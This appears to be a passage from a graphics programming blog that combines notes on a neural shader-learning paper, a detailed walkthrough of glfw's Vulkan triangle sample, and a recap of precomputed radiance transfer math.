  - for each intermediate feature, rescale the clamped values to the fixed range $ [-1,1] $
  - Record the bias and scale used (in rescaling)

The scale and bias are recorded and used in both training and testing, but the values will be clamped to the range [-2, 2] to allow data extrapolation.
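
The clamp-then-rescale procedure for a single trace feature might be sketched as follows. The percentile p = 5, gamma = 2, the nearest-rank percentile definition, and the function names are all assumptions made for illustration; the check for whether clamping is needed at all is left out.

```python
import math


def percentile(sorted_values, p):
    """Nearest-rank percentile of an already sorted list, with p in [0, 100]."""
    rank = max(1, math.ceil(p / 100 * len(sorted_values)))
    return sorted_values[rank - 1]


def fit_whitening(values, p=5.0, gamma=2.0):
    """Return (scale, bias) mapping the clamped training values onto [-1, 1]."""
    finite = sorted(v for v in values if math.isfinite(v))  # drop NaN, Inf, -Inf
    p0, p1 = percentile(finite, p), percentile(finite, 100 - p)
    lo, hi = p0 - gamma * (p1 - p0), p1 + gamma * (p1 - p0)
    clamped = [min(max(v, lo), hi) for v in finite]
    cmin, cmax = min(clamped), max(clamped)
    if cmax == cmin:  # constant feature: just center it
        return 1.0, -cmin
    scale = 2.0 / (cmax - cmin)
    return scale, -1.0 - scale * cmin


def apply_whitening(v, scale, bias):
    """Apply the recorded scale and bias, clamping to [-2, 2] for extrapolation."""
    return min(max(scale * v + bias, -2.0), 2.0)


train = [float(i) for i in range(101)] + [1e9, math.inf, math.nan]
scale, bias = fit_whitening(train)
```

In this example the outlier 1e9 no longer stretches the range: ordinary values stay within [-1, 1] and the outlier saturates at 2.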

This part feels a bit messy…

Network

Architecture

1x1 Conv + Feature Reduction (N = 200 -> K = 48)
1x1 Conv * 3
Dilated Convolution (1, 2, 4, 8, 1)
1x1 Conv * 3
1x1 Conv + Feature Reduction (K = 48 -> 3, that is, RGB color output)

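Loss function

$ L_b = L_c + \alpha L_p $

$ L_c $ is the standard $ L_2 $ loss on the RGB image
$ L_p $ is LPIPS, the perceptual loss metric from the paper The Unreasonable Effectiveness of Deep Features as a Perceptual Metric
- Roughly: the authors built an image similarity dataset with many distortions and images output by common CNN tasks, ran 2AFC and JND tests on it, and then learned this metric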
- The Zhihu article on LPIPS, titled 深度特征度量图像相似度的有效性, is a good write-up

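The paper also has an Appendix D, which gives the GAN loss used in the experiments

Training strategy

Results

Results are compared against a baseline method, RGBx, which learns from hand-picked input features: normal, depth, diffuse, and specular color (where applicable).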

Denoising fragment shaders

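The goal is to learn the 1000spp reference image from a 1spp image.

Reconstructing simplified shaders

The task is to reconstruct the output of the original shader from the output of a simplified shader.

The shaders are simplified using loop perforation and genetic programming simplification.

Two conditional GANs are used, called the Spatial GAN and the Temporal GAN. One generates the ground truth $ c_y $ (the output of the original shader) from the 1spp image $ c_x $; the other generates the next frame from the 1spp outputs of the previous three frames plus the Spatial GAN generator's outputs for the previous two frames, i.e. it maps the sequence $ \tilde {c_x} $ to the sequence $ \tilde {c_y} $.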

GAN related:

四天搞懂生成对抗网络（一）——通俗理解经典GAN

四天搞懂生成对抗网络（二）——风格迁移的“精神始祖”Conditional GAN

Postprocessing filters

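Learn shaders for post-processing effects, such as an edge-aware sharpening filter and defocus blur.

Learning to approximate simulation

Learn the future output of shaders that perform simulation.

Trace effectiveness analysis

The analysis mainly covers the following:

Which input features matter most?
- The authors rate importance by the first-order derivative of the loss with respect to each input trace feature
Can training use only a subset?
- Given a training budget of m features, evaluating arbitrary subsets (choosing m out of N) is too expensive, so three selections are compared
  - Oracle: the top m input trace features by the importance score described in item 1
  - Opponent: the bottom m input trace features by the importance score described in item 1
  - Uniform: m features picked without regard to importance
- Finding: Oracle > Opponent > Uniform
Learning multiple shaders jointly
- Learning the denoising task over multiple shaders jointly feels like training a true denoiser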

A Full Walkthrough of a Sample Vulkan Program 2022-12-29

Introduction

Some useful links:

Khronos Blog - Understanding Vulkan Synchronization

Yet another blog explaining Vulkan synchronization - Maister’s Graphics Adventures

This post mainly analyzes the file tests/triangle-vulkan.c from the glfw library.

Flow

Update 2023-02-13: added the missing step of creating the logical device, vkCreateDevice

demo_init
- demo_init_connection
  - glfwSetErrorCallback
  - gladLoadVulkanUserPtr: makes glad use glfwGetInstanceProcAddress to load all Vulkan function pointers
- demo_init_vk
  - Enable validation layers:
    - vkEnumerateInstanceLayerProperties
    - demo_check_layers: check that the required set of validation layers is available
  - glfwGetRequiredInstanceExtensions: get the platform surface extensions that are required
  - Prepare the list of instance extensions to enable
    - VK_EXT_debug_report
    - VK_KHR_portability_enumeration
  - vkCreateInstance
  - vkEnumeratePhysicalDevices
  - Check whether the device supports VK_KHR_swapchain
    - vkEnumerateDeviceExtensionProperties
  - vkCreateDebugReportCallbackEXT
  - vkGetPhysicalDeviceProperties
  - vkGetPhysicalDeviceQueueFamilyProperties
  - vkGetPhysicalDeviceFeatures
demo_create_window
- glfwWindowHint
- glfwCreateWindow
- glfwSetWindowUserPointer
- glfwSetWindowRefreshCallback
- glfwSetFramebufferSizeCallback
- glfwSetKeyCallback
demo_init_vk_swapchain
- glfwCreateWindowSurface
  - Internally calls vkCreateWin32SurfaceKHR (on Windows)
- Find a queue family that supports both present and graphics; it must be the same one for both
  - vkGetPhysicalDeviceSurfaceSupportKHR
  - queueFlags & VK_QUEUE_GRAPHICS_BIT
- demo_init_device
  - vkCreateDevice: create the logical device
    - VkDeviceCreateInfo
      - .pQueueCreateInfos
        
        .queueFamilyIndex
        
        .queueCount
        
        .pQueuePriorities
      - .ppEnabledLayerNames
      - .ppEnabledExtensionNames: the device extensions to enable
        
        It seems that passing instance extension names here works too?
- vkGetDeviceQueue
- Choose the best surface format
  - vkGetPhysicalDeviceSurfaceFormatsKHR
- vkGetPhysicalDeviceMemoryProperties

demo_prepare

Create the command pool
- vkCreateCommandPool
Allocate a command buffer
- vkAllocateCommandBuffers
  - VkCommandBufferAllocateInfo:
    - .level = VK_COMMAND_BUFFER_LEVEL_PRIMARY
    - .commandBufferCount = 1
demo_prepare_buffers
- Check the surface capabilities and present modes
  - vkGetPhysicalDeviceSurfaceCapabilitiesKHR
  - vkGetPhysicalDeviceSurfacePresentModesKHR
- Create the swapchain
  - Compute the swapchain image extent
  - .preTransform uses VK_SURFACE_TRANSFORM_IDENTITY_BIT_KHR, or the current surface transform if that is not supported
  - .minImageCount uses the minImageCount from the surface capabilities
  - .presentMode is set to VK_PRESENT_MODE_FIFO_KHR
  - vkCreateSwapchainKHR
  - If there is an old swapchain: vkDestroySwapchainKHR
  - vkGetSwapchainImagesKHR retrieves the swapchain images as VkImage handles
  - Call vkCreateImageView on each swapchain image to create its color attachment view
    
    Component Swizzle: TODO check spec
demo_prepare_depth
- vkCreateImage creates the depth image
  - .arrayLayers can specify the number of layers of a texture array
- vkGetImageMemoryRequirements gets the image's memory requirements
- Choose the memory size and memory type
  - memory_type_from_properties : todo check this
- vkAllocateMemory allocates the memory the image needs and returns a VkDeviceMemory
- vkBindImageMemory binds the allocated VkDeviceMemory to the VkImage
- demo_set_image_layout
  - If demo->setup_cmd is null:
    - Call vkAllocateCommandBuffers to allocate a VK_COMMAND_BUFFER_LEVEL_PRIMARY command buffer from demo->cmd_pool
    - vkBeginCommandBuffer
  - Prepare the image memory barrier
    - VkImageMemoryBarrier
      - .srcAccessMask = 0
        
        No reads or writes in the src stage need to be made coherent
      - .dstAccessMask:
        
        For VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, set to VK_ACCESS_DEPTH_STENCIL_ATTACHMENT_WRITE_BIT
      - .oldLayout = VK_IMAGE_LAYOUT_UNDEFINED, i.e. the existing contents are garbage
      - .newLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
  - Record the pipeline barrier
    - vkCmdPipelineBarrier
      - srcStageMask = VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, i.e. wait for nothing
      - dstStageMask = VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, i.e. every subsequent command must wait for the barrier to finish before it starts
      - The image memory barrier prepared above is passed in as well
- vkCreateImageView creates the ImageView for the depth buffer image
demo_prepare_textures
- vkGetPhysicalDeviceFormatProperties gets the VkFormatProperties of VK_FORMAT_B8G8R8A8_UNORM
- For each texture
  Each texture is managed through a texture_object
  - VkSampler sampler;
  - VkImage image;
  - VkImageLayout imageLayout;
  - VkDeviceMemory mem;
  - VkImageView view;
  - int32_t tex_width, tex_height;
  - If the sampler supports linear tiling (for this format) (props.linearTilingFeatures & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)
    - demo_prepare_texture_image with required_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT
      - vkCreateImage
      - vkGetImageMemoryRequirements
      - memory_type_from_properties
        
        For each memory type the device supports, check whether it satisfies required_props above
      - vkAllocateMemory
      - vkBindImageMemory
      - If the memory type has the VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT property
        
        vkGetImageSubresourceLayout
        
        vkMapMemory: map it into the address space
        
        Fill it in
        
        vkUnmapMemory
      - Set the image layout (analyzed above)
        
        VK_IMAGE_LAYOUT_PREINITIALIZED -> VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL
        
        demo_set_image_layout
  - If the sampler does not support linear tiling for this format but does support optimal tiling (props.optimalTilingFeatures & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)
    - Prepare a host-coherent, host-visible staging texture and a GPU device-local texture
      - demo_prepare_texture_image * 2
        
        The device-local one obviously cannot be initialized from the host here
      - Note the memory props
    - Change the layouts so that transfer commands can be used
      - staging texture: VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL
      - device local texture: VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL
    - vkCmdCopyImage
    - Change the device local texture's layout back
      - demo_set_image_layout
    - demo_flush_init_cmd: flush the setup cmd synchronously
      - vkEndCommandBuffer
      - vkQueueSubmit
        
        no wait / signal semaphores
      - vkQueueWaitIdle
      - vkFreeCommandBuffers
      - demo->setup_cmd = VK_NULL_HANDLE
    - demo_destroy_texture_image destroys the staging texture
  - Create the corresponding sampler and image view
    - vkCreateSampler
    - vkCreateImageView
demo_prepare_vertices

Here host-visible & host-coherent memory is used directly as the vertex buffer,
rather than device-local memory filled through a separate staging buffer copy.

Probably just taking a shortcut.jpg
- vkCreateBuffer
  - with .usage = VK_BUFFER_USAGE_VERTEX_BUFFER_BIT
- vkGetBufferMemoryRequirements
- memory_type_from_properties
- vkAllocateMemory
- vkMapMemory
- vkUnmapMemory
- vkBindBufferMemory
- Configure a few structs
  - VkPipelineVertexInputStateCreateInfo
    - VkVertexInputBindingDescription
    - VkVertexInputAttributeDescription
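
The memory_type_from_properties step that appears several times above boils down to a bitmask search. The sketch below mirrors that logic in Python rather than C, purely as an illustration: the function name find_memory_type and the example memory type table are hypothetical, while the three flag values follow the Vulkan VkMemoryPropertyFlagBits definitions.

```python
DEVICE_LOCAL = 0x1   # VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT
HOST_VISIBLE = 0x2   # VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT
HOST_COHERENT = 0x4  # VK_MEMORY_PROPERTY_HOST_COHERENT_BIT


def find_memory_type(type_bits, property_flags, required):
    """Return the first memory type index allowed by type_bits whose
    property flags contain every bit in `required`, or None if there is none."""
    for index, flags in enumerate(property_flags):
        allowed = (type_bits >> index) & 1  # bit i set: memory type i is usable
        if allowed and (flags & required) == required:
            return index
    return None


# Hypothetical device exposing three memory types
types = [DEVICE_LOCAL,
         HOST_VISIBLE | HOST_COHERENT,
         DEVICE_LOCAL | HOST_VISIBLE | HOST_COHERENT]

# type_bits would come from VkMemoryRequirements.memoryTypeBits
vertex_buffer_type = find_memory_type(0b111, types, HOST_VISIBLE | HOST_COHERENT)
```

Here type_bits restricts the search to memory types the resource may use, and the required flags filter for the properties the application needs.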

demo_prepare_descriptor_layout

vkCreateDescriptorSetLayout

VkDescriptorSetLayoutCreateInfo

.pBindings = &layout_binding

layout_binding: specifies what goes at each binding slot - may be an array

const VkDescriptorSetLayoutBinding layout_binding = {
  .binding = 0,
  .descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER,
  .descriptorCount = DEMO_TEXTURE_COUNT,
  .stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT,
  .pImmutableSamplers = NULL,
};

vkCreatePipelineLayout
- VkPipelineLayoutCreateInfo: demo->pipeline_layout
  - Specifies the number of descriptor set layouts and the pointer to their array

demo_prepare_render_pass
- vkCreateRenderPass
  - VkRenderPassCreateInfo
    - .pAttachments: VkAttachmentDescription
      - [0]: Color Attachment
        
        .samples = VK_SAMPLE_COUNT_1_BIT (number of samples of the image)
        
        .loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR (how the color & depth contents are treated at the start of the subpass)
        
        .storeOp = VK_ATTACHMENT_STORE_OP_STORE (how the color & depth contents are treated at the end of the subpass)
        
        .stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE (how the stencil contents are treated at the start of the subpass)
        
        .stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE (how the stencil contents are treated at the end of the subpass)
        
        .initialLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL (layout of the image subresource before the subpass begins)
        
        .finalLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL (layout the image subresource is automatically transitioned to after the subpass ends)
      - [1]: Depth Stencil Attachment
        
        .format = demo->depth.format
        
        .samples = VK_SAMPLE_COUNT_1_BIT
        
        .loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR
        
        .storeOp = VK_ATTACHMENT_STORE_OP_DONT_CARE
        
        .stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE
        
        .stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE
        
        .initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
        
        .finalLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
    - .pSubpasses: VkSubpassDescription
      
      A single render pass can consist of multiple subpasses. Subpasses are subsequent rendering operations that depend on the contents of framebuffers in previous passes, for example a sequence of post-processing effects that are applied one after another. If you group these rendering operations into one render pass, then Vulkan is able to reorder the operations and conserve memory bandwidth for possibly better performance. Render passes - Vulkan Tutorial
      - .pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS 该 subpass 支持的 pipeline 类型
      - .pInputAttachments = NULL
      - .pColorAttachments = &color_reference
        
        VkAttachmentReference {.attachment = 0, .layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}
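        refers to [0] above
      - .pDepthStencilAttachment = &depth_reference
        
        VkAttachmentReference {.attachment = 1, .layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}
        refers to [1] above
    - .pDependencies: VkSubpassDependency; when there are multiple subpasses, specifies the read/write dependencies between them
      
      Much like vkCmdPipelineBarrier + VkMemoryBarrier; the only difference is that the synchronization scope is limited to the specified subpasses rather than all earlier and later operations (Vulkan Spec)
demo_prepare_pipeline
- vkCreatePipelineCache: (optional for pipeline creation)
  
  Mainly lets the implementation cache compiled pipelines; an allocator can be used to limit the size of its cached data; a cache saved earlier (by the application) can be imported at creation time, etc.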
- vkCreateGraphicsPipelines
  - VkGraphicsPipelineCreateInfo
    - .layout = demo->pipeline_layout
    - .pVertexInputState: VkPipelineVertexInputStateCreateInfo
      - Already prepared in demo_prepare_vertices
    - .pInputAssemblyState: VkPipelineInputAssemblyStateCreateInfo
      - .topology = VK_PRIMITIVE_TOPOLOGY_TRIANGLE_LIST
    - .pRasterizationState: VkPipelineRasterizationStateCreateInfo
      - .polygonMode = VK_POLYGON_MODE_FILL
      - .cullMode = VK_CULL_MODE_BACK_BIT
      - .frontFace = VK_FRONT_FACE_CLOCKWISE
        
        front-facing triangle orientation to be used for culling
      - .depthClampEnable = VK_FALSE
        
        Depth clamping is disabled
      - .rasterizerDiscardEnable = VK_FALSE
        
        Whether primitives are discarded immediately before the rasterization stage
      - .depthBiasEnable = VK_FALSE
      - .lineWidth = 1.0f
        
        Width of rasterized line segments
    - .pColorBlendState: VkPipelineColorBlendStateCreateInfo
      - .pAttachments: VkPipelineColorBlendAttachmentState, defines the blend state for each color attachment
        
        [0]
        
        .colorWriteMask = 0xf
        
        Write all four RGBA channels (Vulkan Spec)
        
        .blendEnable = VK_FALSE
        
        Blending is disabled; values are written directly
    - .pMultisampleState: VkPipelineMultisampleStateCreateInfo
      - .rasterizationSamples = VK_SAMPLE_COUNT_1_BIT
      - .pSampleMask = NULL
    - .pViewportState: VkPipelineViewportStateCreateInfo
      - .viewportCount = 1
      - .scissorCount = 1
      - However, dynamic state is used here, so the viewport and scissor are supplied when the command buffer is recorded rather than at pipeline creation
        
        See .pDynamicState for details
    - .pDepthStencilState: VkPipelineDepthStencilStateCreateInfo
      - .depthTestEnable = VK_TRUE
      - .depthWriteEnable = VK_TRUE
      - .depthCompareOp = VK_COMPARE_OP_LESS_OR_EQUAL
      - .depthBoundsTestEnable = VK_FALSE
        
        Samples coverage = 0 if outside the bound predetermined
        
        28.8. Depth Bounds Test
      - .stencilTestEnable = VK_FALSE (the fields below are all stencil test parameters)
      - .back.failOp = VK_STENCIL_OP_KEEP
      - .back.passOp = VK_STENCIL_OP_KEEP
      - .back.compareOp = VK_COMPARE_OP_ALWAYS
      - .front = ds.back
    - .pStages: VkPipelineShaderStageCreateInfo
      - [0]
        
        .stage = VK_SHADER_STAGE_VERTEX_BIT
        
        .pName = "main"
        
        .module = demo_prepare_vs(demo)
        
        Call demo_prepare_shader_module with vert SPIR-V code
        
        vkCreateShaderModule with size_t codeSize & uint32_t *pCode
      - [1]
        
        .stage = VK_SHADER_STAGE_FRAGMENT_BIT
        
        .pName = "main"
        
        .module = demo_prepare_fs(demo)
        
        Similar with above
    - .pDynamicState: VkPipelineDynamicStateCreateInfo
      - .pDynamicStates = dynamicStateEnables
        
        Enables VK_DYNAMIC_STATE_VIEWPORT and VK_DYNAMIC_STATE_SCISSOR
    - .renderPass: VkRenderPass
      Pass in the VkRenderPass created earlier
- vkDestroyPipelineCache
- vkDestroyShaderModule * 2
  - Destroys the two shader modules for vs and fs that were just created (demo_prepare_vs / demo_prepare_fs)
demo_prepare_descriptor_pool
- vkCreateDescriptorPool
  - VkDescriptorPoolCreateInfo
    - .pPoolSizes = &type_count
      - VkDescriptorPoolSize
        
        .type = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER
        
        .descriptorCount = DEMO_TEXTURE_COUNT
demo_prepare_descriptor_set
- vkAllocateDescriptorSets: allocates descriptor sets from the descriptor pool according to the descriptor set layouts
  - .pSetLayouts = &demo->desc_layout
  - .descriptorPool = demo->desc_pool
- vkUpdateDescriptorSets
  Supports two kinds of descriptor set update requests, write and copy
  - VkWriteDescriptorSet
    - .dstSet = demo->desc_set (the descriptor set just allocated)
    - .descriptorCount = DEMO_TEXTURE_COUNT
    - .descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER
    - .pImageInfo = tex_descs
      - VkDescriptorImageInfo: the actual descriptor contents
        
        .sampler = demo->textures[i].sampler
        
        .imageView = demo->textures[i].view
        
        .imageLayout = VK_IMAGE_LAYOUT_GENERAL
        
        I feel the matching layout should be used here instead; not sure whether this is acceptable
demo_prepare_framebuffers
- Create demo->swapchainImageCount VkFramebuffers
  - vkCreateFramebuffer
    - VkFramebufferCreateInfo
      - .renderPass = demo->renderpass
      - .pAttachments: VkImageView[]
        
        [0]: Color Attachment, demo->buffers[i].view
        
        That is, the swapchain image view
        
        [1]: Depth Attachment
        
        demo->depth.view
      - .width, .height
      - .layers = 1
        
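        Just as a VkImage can be created with multiple layers, so can a framebuffer; however, shaders other than geometry shaders write to the first layer by default
        
        Multi-layer images / framebuffers are accessed in shaders using texture array syntax

demo_run
- glfwWindowShouldClose: checks the window's closing flag
- glfwPollEvents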
- demo_draw
  - vkCreateSemaphore: imageAcquiredSemaphore
  - vkCreateSemaphore: drawCompleteSemaphore
  - vkAcquireNextImageKHR
    
    One issue here: returning from this call does not mean that presentation has finished (the recommended practice is to have a semaphore signaled and then wait on that semaphore)
    
    So under what circumstances does this call block?
    See also Let’s get swapchain’s image count straight - StackOverflow
    - timeout = UINT64_MAX
    - semaphore = imageAcquiredSemaphore
    - pImageIndex = &demo->current_buffer: index of the next image to use
      - The semaphore is signaled on completion
    - Return values
      - VK_ERROR_OUT_OF_DATE_KHR
        
        demo_resize: handles the resize case: destroy everything
        
        vkDestroyFramebuffer
        
        vkDestroyDescriptorPool
        
        vkFreeCommandBuffers
        
        vkDestroyCommandPool
        
        vkDestroyPipeline
        
        vkDestroyRenderPass
        
        vkDestroyPipelineLayout
        
        vkDestroyDescriptorSetLayout
        
        vkDestroyBuffer (vertex buffer)
        
        vkFreeMemory (vertex buffer memory)
        
        vkDestroyImageView
        
        vkDestroyImage
        
        vkDestroySampler
        
        …
        
        call demo_prepare
        
        demo_draw: calls itself again
      - VK_SUBOPTIMAL_KHR: not optimal, but presenting still works, so it is ignored
  - demo_flush_init_cmd: flush the setup cmd synchronously
    - vkEndCommandBuffer
    - vkQueueSubmit
      - no wait / signal semaphores
    - vkQueueWaitIdle
    - vkFreeCommandBuffers
    - demo->setup_cmd = VK_NULL_HANDLE
  - demo_draw_build_cmd
    - vkBeginCommandBuffer: demo->draw_cmd
    - vkCmdPipelineBarrier
      - Execution barrier part
        
        srcStageMask = VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, i.e. wait for everything
        
        dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT (Specifies no stage of execution)
        
        VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT is equivalent to VK_PIPELINE_STAGE_ALL_COMMANDS_BIT with VkAccessFlags set to 0 when specified in the first synchronization scope, but specifies no stage of execution when specified in the second scope.
      - Memory barrier part: layout transition of the color attachment
        
        From VK_IMAGE_LAYOUT_UNDEFINED -> VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL
        
        .dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT
    - vkCmdBeginRenderPass with VK_SUBPASS_CONTENTS_INLINE
      
      VK_SUBPASS_CONTENTS_INLINE specifies that the contents of the subpass will be recorded inline in the primary command buffer, and secondary command buffers must not be executed within the subpass.
      - VkRenderPassBeginInfo
        
        .renderPass
        
        .framebuffer - selects the current framebuffer; there are swapchainImageCount of them
        
        .renderArea
        
        .offset.{x, y}
        
        .extent.{width, height}
        
        .pClearValues = clear_values (VkClearValue)
        
        These correspond to the attachments specified in RenderPassCreateInfo
        
        pClearValues is a pointer to an array of clearValueCount VkClearValue structures containing clear values for each attachment, if the attachment uses a loadOp value of VK_ATTACHMENT_LOAD_OP_CLEAR or if the attachment has a depth/stencil format and uses a stencilLoadOp value of VK_ATTACHMENT_LOAD_OP_CLEAR. The array is indexed by attachment number. Only elements corresponding to cleared attachments are used. Other elements of pClearValues are ignored.
        
        [0] = {.color.float32 = {0.2f, 0.2f, 0.2f, 0.2f}}
        
        [1] = {.depthStencil = {demo->depthStencil, 0}}
        
        demo->depthStencil is used to add an "invisible wall"
    - vkCmdBindPipeline
      - pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS
    - vkCmdBindDescriptorSets
      - layout = demo->pipeline_layout
        Recall: Pipeline layout <= Descriptor Set Layouts
      - Descriptor Sets
    - vkCmdSetViewport
      - VkViewport
        
        .height, .width, .minDepth, .maxDepth
    - vkCmdSetScissor
      - VkRect2D
        
        .extent.{width, height}
        
        .offset.{x, y}
    - vkCmdBindVertexBuffers
      
      Looking at https://github.com/SaschaWillems/Vulkan/blob/master/examples/instancing/instancing.cpp may make this clearer
      - The firstBinding parameter specifies (on the CPU side) which binding to bind to
    - vkCmdDraw
      - vertexCount = 3
      - instanceCount = 1
      - firstVertex = 0
      - firstInstance = 0
    - vkCmdEndRenderPass
    - vkCmdPipelineBarrier
      - Execution barrier:
        
        srcStageMask = VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, i.e. wait for everything
        
        dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT (Specifies no stage of execution)
      - Memory barrier:
        
        Just like transfer, present also requires a layout change
        
        .srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT
        
        .dstAccessMask = VK_ACCESS_MEMORY_READ_BIT
        
        .oldLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL
        
        .newLayout = VK_IMAGE_LAYOUT_PRESENT_SRC_KHR
    - vkEndCommandBuffer: demo->draw_cmd
  - vkQueueSubmit
    - .pCommandBuffers = &demo->draw_cmd
    - .pWaitSemaphores = &imageAcquiredSemaphore
    - .pWaitDstStageMask = &pipe_stage_flags
      - pWaitDstStageMask is a pointer to an array of pipeline stages at which each corresponding semaphore wait will occur.
      - Here it is set to VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT
      - So effectively nothing is waited on
    - .pSignalSemaphores = &drawCompleteSemaphore
  - vkQueuePresentKHR
    - VkPresentInfoKHR
      - .pWaitSemaphores = &drawCompleteSemaphore
      - .pSwapchains = &demo->swapchain
        
        Several can be given, so that multiple swapchains are presented with a single queue present operation
      - .pImageIndices = &demo->current_buffer
    - Return values
      - VK_ERROR_OUT_OF_DATE_KHR
        
        demo_resize
      - VK_SUBOPTIMAL_KHR
        
        Nothing is done
  - vkQueueWaitIdle
  - vkDestroySemaphore: imageAcquiredSemaphore
  - vkDestroySemaphore: drawCompleteSemaphore
- demo->depthStencil changes periodically
- vkDeviceWaitIdle
- If the specified frame count has been reached, glfwSetWindowShouldClose
demo_cleanup
- Destroy ten thousand things (literally)
- glfwDestroyWindow
- glfwTerminate

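Paper Reading | Data-driven PRT 2022-12-18

This post omits a great many details; see the paper for them.

TODO: sort out all the dimensions, since the original paper is not very detailed about them either;

An updated version will be posted here, if there is one.

Recap: Precomputed Radiance Transfer

This section mainly follows Lecture 6 and Lecture 7 of the GAMES 202 course on high-quality real-time rendering

Consider the rendering equation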

$$ L({\bf o}) = \int_{\mathcal{H}^2} L({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} $$

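where

$ {\bf i}, {\bf o} $ are the incoming and outgoing directions
$ L({\bf i}), L({\bf o}) $ are the incoming and outgoing radiance
- The shading point position $ \bf x $, which is also a parameter, is omitted here and below
$ \rho $ is the BRDF
$ V $ is the visibility term

Approximate $ L({\bf i}) $ by finitely many terms of a series, i.e.

$$ L({\bf i}) \approx \sum_{i=1}^{n} l_i B_i({\bf i}) $$

where $ B_i: S^2 \to \mathbb{R} $ are the basis functions

Substituting gives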

$$ \begin{aligned} L({\bf o}) &= \int_{\mathcal{H}^2} L({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} \\ &\approx \sum_i l_i \int_{\mathcal{H}^2} B_i({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} \\ &= \sum_i l_i T_i({\bf o}) \end{aligned} $$

Here the integral above (the “light transport term”) is denoted $ T_i $.

Expanding it further gives

$$ T_i({\bf o}) \approx \sum_{j=1}^{m} t_{ij} B_j({\bf o}) $$

so we obtain

$$ \begin{aligned} L({\bf o}) &\approx \sum_i l_i T_i({\bf o}) \\ &\approx \sum_i l_i \left( \sum_j t_{ij} B_j({\bf o}) \right) \\ &= \sum_j \left( \sum_i l_i t_{ij} \right) B_j({\bf o}) \end{aligned} $$

That is,

$$ L({\bf o}) \approx \begin{bmatrix} l_1 & ... & l_n \end{bmatrix} \begin{bmatrix} t_{11} & ... & t_{1m} \\ \vdots & & \vdots \\ t_{n1} & ... & t_{nm} \end{bmatrix} \begin{bmatrix} B_1({\bf o}) \\ \vdots \\ B_m({\bf o}) \end{bmatrix} $$
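
As a minimal sketch of the matrix form above, the following pure-Python snippet evaluates $ L({\bf o}) $ once as the nested double sum and once as $ (l^T T) B({\bf o}) $. All numeric values and the function names are made up for illustration; a real implementation would take $ l_i $ and $ t_{ij} $ from precomputation and $ B_j({\bf o}) $ from a concrete basis such as spherical harmonics.

```python
def radiance_double_sum(light_coeffs, transport, basis_vals):
    """L(o) ~= sum_i l_i * (sum_j t_ij * B_j(o))."""
    m = len(basis_vals)
    return sum(
        light_coeffs[i] * sum(transport[i][j] * basis_vals[j] for j in range(m))
        for i in range(len(light_coeffs))
    )


def radiance_matrix_form(light_coeffs, transport, basis_vals):
    """L(o) ~= (l^T T) B(o): fold lighting into transport, then dot with B(o)."""
    n, m = len(light_coeffs), len(basis_vals)
    # Row vector l^T T; it does not depend on the view direction o.
    lt = [sum(light_coeffs[i] * transport[i][j] for i in range(n)) for j in range(m)]
    return sum(lt[j] * basis_vals[j] for j in range(m))


# Hypothetical values: n = 2 lighting coefficients, m = 3 basis values B_j(o).
light_coeffs = [1.0, 2.0]
transport = [[1.0, 0.0, 2.0],
             [0.0, 1.0, 1.0]]
basis_vals = [3.0, 4.0, 5.0]

via_sum = radiance_double_sum(light_coeffs, transport, basis_vals)
via_matrix = radiance_matrix_form(light_coeffs, transport, basis_vals)
```

Since $ l^T T $ does not depend on $ {\bf o} $, it can be computed once per shading point, which leaves only an $ m $-dimensional dot product per view direction.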

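The PRT framework is then roughly as follows

Precomputation
- For every possible shading point $ {\bf x} $
  - Compute the coefficients $ l_i $ of the object's environment lighting in the basis
  - Compute the object's light transport expansion coefficients $ t_{ij} $
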